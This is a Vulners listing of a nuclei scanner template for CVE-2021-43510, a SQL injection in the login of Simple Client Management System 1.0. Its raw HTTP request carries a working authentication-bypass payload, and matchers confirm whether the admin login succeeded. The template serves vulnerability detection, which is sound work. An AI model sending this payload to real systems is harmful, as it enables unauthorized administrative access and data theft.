Lucene search
K

Sourcecodester Simple Client Management System 1.0 - SQL Injection

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

Sourcecodester Simple Client Management Sys 1.0-SQL Injectio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-43510
1 Feb 202216:26
circl
CNNVD
Sourcecodester Simple Client Management System SQL注入漏洞
1 Feb 202200:00
cnnvd
CNVD
Sourcecodester Simple Client Management System SQL注入漏洞
10 Feb 202200:00
cnvd
CVE
CVE-2021-43510
1 Feb 202213:14
cve
Cvelist
CVE-2021-43510
1 Feb 202213:14
cvelist
NVD
CVE-2021-43510
1 Feb 202214:15
nvd
OSV
CVE-2021-43510
1 Feb 202214:15
osv
Prion
Sql injection
1 Feb 202214:15
prion
id: CVE-2021-43510

info:
  name: Sourcecodester Simple Client Management System 1.0 - SQL Injection
  author: edoardottt
  severity: critical
  description: |
    Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Simple Client Management System 1.0.
  reference:
    - https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
    - https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43510
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/r4hn1/Simple-Client-Management-System-Exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-43510
    cwe-id: CWE-89
    epss-score: 0.67198
    epss-percentile: 0.98579
    cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: simple_client_management_system_project
    product: simple_client_management_system
  tags: cve2021,cve,simpleclientmanagement,sqli,auth-bypass,simple_client_management_system_project,vuln

http:
  - raw:
      - |
        POST /classes/Login.php?f=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin'+or+'1'%3d'1'--+-&password=as
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - 'contains(header_1, "text/html")'
          - 'status_code_1 == 200'
          - 'contains(body_1, "{\"status\":\"success\"}")'
          - 'contains(body_2, "Welcome to Simple Client")'
        condition: and
# digest: 4a0a004730450221008259f0f599c3b186f0702adc5ff6ecacee575822202125607204d3c61d4cbecd02204d2a120b681e1c7abbad02b3dbbd6be66caec332df9b16d4846639855ba64b2a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.67198
24